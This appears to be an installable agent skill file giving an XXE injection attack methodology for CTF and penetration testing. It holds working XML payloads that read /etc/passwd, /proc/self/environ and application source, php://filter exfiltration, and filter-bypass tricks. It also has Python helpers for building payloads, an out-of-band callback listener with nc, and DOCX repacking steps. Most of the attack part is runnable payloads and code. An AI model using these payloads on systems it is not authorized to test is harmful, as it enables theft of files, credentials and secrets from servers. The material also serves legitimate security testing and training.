xxe-injection-methodology

Name: xxe-injection-methodology
Author: wgpsec/AboutSecurity

$ npx mdskill add wgpsec/AboutSecurity/xxe-injection-methodology

Exploit XML parsers to read files via XXE injection.

Detects and exploits XXE vulnerabilities in SOAP, file upload, and JSON endpoints.
Executes payloads using external DTDs, parameter entities, and blind out-of-band techniques.
Selects attack vectors based on whether the response echoes entity content, SOAP envelope structure, or Content-Type headers.
Delivers file contents or out-of-band data through XML entity references or HTTP servers.

SKILL.md

.github/skills/xxe-injection-methodology

---
name: xxe-injection-methodology
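description: "Detection and exploitation methodology for XML External Entity (XXE) injection. Use when the target parses XML, exposes a SOAP API, accepts file uploads (DOCX/XLSX/SVG), or has any endpoint that accepts XML input. Covers basic file read, blind XXE out-of-band exfiltration (parameter entities + external DTD), SVG/DOCX XXE, SOAP Envelope XXE, and JSON→XML conversion attacks. Even when the API documentation says only JSON is accepted, try an XML Content-Type to test for implicit XXE."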
metadata:
  tags: "xxe,xml,xml external entity,blind-xxe,dtd,soap,svg,docx,file-read,oob,parameter-entity,application/xml,text/xml,DOCTYPE,ENTITY,外部实体,xml解析,Content-Type: xml"
  category: "exploit"
---

# XXE Injection Attack Methodology

## Further Reference

- Full payloads for XXE file read, blind XXE out-of-band exfiltration, SVG/DOCX XXE, and SOAP XXE → [references/xxe-exploitation.md](references/xxe-exploitation.md)
- Advanced XXE techniques (blind/OOB/file upload/XInclude/encoding bypass) → [references/xxe-advanced.md](references/xxe-advanced.md)

---

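## Phase 1: Find XXE Entry Points

- Endpoints with Content-Type `application/xml` or `text/xml`
- **Switch a JSON request to XML**: even if the endpoint accepts JSON, try sending XML (many backends support both formats)
- File uploads (DOCX and XLSX are ZIP archives of XML parts; SVG is plain XML)
- SOAP APIs (URL contains `/ws/`, `/soap/`, or `/wsdl/`)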

## Phase 2: Basic XXE File Read

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root><data>&xxe;</data></root>
```

**Key point**: `&xxe;` must be placed inside an XML element whose value is echoed back in the response!
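The payload above can be generated for different target URIs and echoed elements. The following is a minimal sketch, not part of the original skill: the function name `build_file_read_payload` and its parameters are hypothetical, and the element names must be adapted to whatever the target actually reflects.

```python
def build_file_read_payload(target_uri: str, element: str = "data", root: str = "root") -> str:
    """Return an XML document whose <element> body references an external entity.

    Hypothetical helper: `element` should be the tag the target echoes back.
    """
    # A double quote would terminate the SYSTEM literal early, so reject it.
    if '"' in target_uri:
        raise ValueError("target_uri must not contain a double quote")
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE {root} [<!ENTITY xxe SYSTEM "{target_uri}">]>\n'
        f"<{root}><{element}>&xxe;</{element}></{root}>"
    )
```

For example, `build_file_read_payload("file:///etc/passwd")` reproduces the three-line document shown above.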

### Common Target Files

```
file:///flag.txt
file:///flag
file:///app/flag.txt
file:///etc/passwd
file:///app/app.py
file:///proc/self/environ
```

## Phase 3: Exploitation Decision Tree

```
XXE entry point confirmed
├─ SOAP endpoint? → The XXE payload must be embedded in the SOAP Envelope! → [references/xxe-exploitation.md](references/xxe-exploitation.md)
├─ Response echoed? → Read files directly with ENTITY file:///
├─ No echo? → Blind XXE: parameter entities + external DTD for out-of-band exfiltration
│  ├─ Run `python3 -m http.server` or `nc -lvp PORT` in bash to receive the OOB callback
│  └─ [references/xxe-exploitation.md](references/xxe-exploitation.md)
├─ PHP target? → php://filter/convert.base64-encode to get around XML special characters
└─ File upload entry point? → SVG/DOCX XXE → [references/xxe-exploitation.md](references/xxe-exploitation.md)
```
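For the no-echo branch, `python3 -m http.server` is usually enough, but a small custom listener makes it easier to collect the callback paths programmatically. The sketch below uses only the standard library; `CallbackLogger` and `start_listener` are hypothetical names, and it only records incoming GET requests (it does not serve a DTD).

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


class CallbackLogger(BaseHTTPRequestHandler):
    """Record every GET request so out-of-band callbacks can be inspected later."""

    hits = []  # shared list of (client_ip, request_path) tuples

    def do_GET(self):
        # Exfiltrated data typically arrives in the path or query string.
        CallbackLogger.hits.append((self.client_address[0], self.path))
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, fmt, *args):
        pass  # silence the default per-request stderr logging


def start_listener(host: str = "127.0.0.1", port: int = 0) -> HTTPServer:
    """Start the listener in a daemon thread; port 0 lets the OS pick a free port."""
    server = HTTPServer((host, port), CallbackLogger)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

In an authorized test the listener would be bound to an address the target can reach, for instance `start_listener("0.0.0.0", 8000)`, and `CallbackLogger.hits` inspected after the payload is sent.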

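## Phase 4: PHP-Specific Tricks

PHP files contain `<` and other special characters that break XML parsing once the entity is expanded. Use the php://filter base64 encoder to get around this: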
```xml
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/app/config.php">
```
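The response then carries the file as base64 text that has to be decoded locally. A minimal sketch, assuming the encoded file is the longest base64-looking run in the response body (the helper name `decode_filter_output` is hypothetical):

```python
import base64
import re


def decode_filter_output(response_text: str) -> str:
    """Decode the longest base64-looking run found in a response body."""
    candidates = re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", response_text)
    if not candidates:
        raise ValueError("no base64 run found in response")
    blob = max(candidates, key=len)
    # Restore padding in case the application trimmed trailing '=' characters.
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-8", errors="replace")
```

If the response contains other long alphanumeric strings (tokens, hashes), extract the echoed element first and pass only its text.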

## Phase 5: JSON → XML Conversion Attack

Some backends support both JSON and XML, and the parser picks the format automatically:

```
Content-Type: application/xml
```
```xml
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///flag.txt">]>
<root><username>&xxe;</username><password>test</password></root>
```

Even if the documentation says JSON only, try an XML Content-Type; the endpoint may support it implicitly.
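Before adding a DOCTYPE, it helps to confirm that the endpoint accepts a plain XML rendering of the same fields. The sketch below converts a flat JSON object into the equivalent XML body; `json_to_xml` is a hypothetical helper, and the root tag `root` is an assumption, since the element names a backend expects vary by framework.

```python
import json
import xml.etree.ElementTree as ET


def json_to_xml(json_body: str, root_tag: str = "root") -> str:
    """Convert a flat JSON object into XML with one child element per key."""
    data = json.loads(json_body)
    root = ET.Element(root_tag)
    for key, value in data.items():
        child = ET.SubElement(root, key)
        child.text = str(value)
    # encoding="unicode" returns a str without an XML declaration, so add one.
    return '<?xml version="1.0"?>\n' + ET.tostring(root, encoding="unicode")
```

If the benign XML body is processed the same way as the JSON one, the DOCTYPE and `&xxe;` reference from the example above can be added next.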

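## Bypassing XXE Defenses

- `<!DOCTYPE>` filtered → try UTF-16 encoding
- `ENTITY` filtered → if the filter only targets general entities (`&xxe;`), try parameter entities (`%xxe;`); the declaration still contains the `ENTITY` keyword, so a plain keyword filter needs an encoding change instead
- `SYSTEM` filtered → try `PUBLIC "x" "file:///flag"`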
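The UTF-16 idea works against filters that scan the raw bytes for ASCII keywords, because every character becomes two bytes. A minimal sketch, assuming the payload declares `encoding="UTF-8"` and that the target parser accepts UTF-16 input (`to_utf16` is a hypothetical helper):

```python
def to_utf16(xml_text: str) -> bytes:
    """Re-encode an XML payload as UTF-16 with a byte order mark."""
    # Keep the declared encoding consistent with the bytes actually sent.
    declared = xml_text.replace('encoding="UTF-8"', 'encoding="UTF-16"', 1)
    # Python's "utf-16" codec prepends a BOM, which XML parsers use for detection.
    return declared.encode("utf-16")
```

The request would then typically be sent with a matching header such as `Content-Type: application/xml; charset=utf-16`.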

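## Notes

- **XXE inherently includes SSRF**: `SYSTEM "http://..."` is a server-side request
- **XML parsers differ**: Python lxml resolves only internal entities by default since version 5.0 (earlier versions resolve local-file external entities but block network access by default); Java parsers such as `DocumentBuilderFactory` have traditionally resolved external entities unless explicitly hardened
- **Blind XXE needs an external server**: parameter-entity exfiltration requires a server you control to receive the data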

---

## Additional CTF XXE Tricks

### DOCX/Office XML Upload XXE
A DOCX file is a ZIP archive containing XML parts. Modify `[Content_Types].xml` to inject the XXE:
```bash
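unzip template.docx -d docx_tmp
# Edit docx_tmp/[Content_Types].xml to add the DOCTYPE + ENTITY
# Zip from inside the directory so template.docx itself is not packed in
(cd docx_tmp && zip -r ../exploit.docx .)
# After upload, the XXE triggers when the server parses the XML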
```
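The same repacking can be done without touching the filesystem. The sketch below uses Python's `zipfile` module to copy an archive and insert a DOCTYPE after the XML declaration of one part; `repack_docx` is a hypothetical helper, and it only inserts the declaration. Where the entity reference goes depends on which value the server-side parser reads back.

```python
import io
import zipfile


def repack_docx(docx_bytes: bytes, doctype: str, part: str = "[Content_Types].xml") -> bytes:
    """Copy a DOCX archive, inserting `doctype` after the XML declaration of `part`."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            data = src.read(info.filename)
            if info.filename == part:
                text = data.decode("utf-8-sig")  # tolerate a leading BOM
                # Insert right after the XML declaration if present, else at the start.
                end = text.find("?>")
                cut = end + 2 if text.startswith("<?xml") and end != -1 else 0
                text = text[:cut] + "\n" + doctype + "\n" + text[cut:]
                data = text.encode("utf-8")
            dst.writestr(info.filename, data)
    return out.getvalue()
```

All other parts are copied byte for byte, so the result still opens as a normal document apart from the modified part.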

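### More XML Injection Points
Beyond the regular request body, check these injection points:
- Headers such as `X-Forwarded-For` when they are written into XML logs
- SVG file uploads (SVG is XML)
- SOAP/SAML endpoints
- RSS/Atom feed inputs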